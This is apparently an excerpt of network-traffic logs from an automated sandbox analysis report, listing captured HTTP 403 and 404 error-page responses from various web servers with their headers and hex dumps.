              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:32 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:33 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EvYjeKaOpdWVm1MsSV0HdRU0CjKE0C7nbZjMilnY0IR32qItfzfMuHyg%2FZ%2Fn9sO%2Bkm50r6TXnWUUItDMekXorWWyZjNCX7jW9qxU594l92xzUh11RPjMSBN%2FKKIc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e760fa97741ad-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="mar
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 15 Sep 2023 05:27:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:34 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:34 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:34 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:35 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Fri, 15 Sep 2023 05:27:35 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:35 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:38 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:38 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 806e76353d9c428b-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
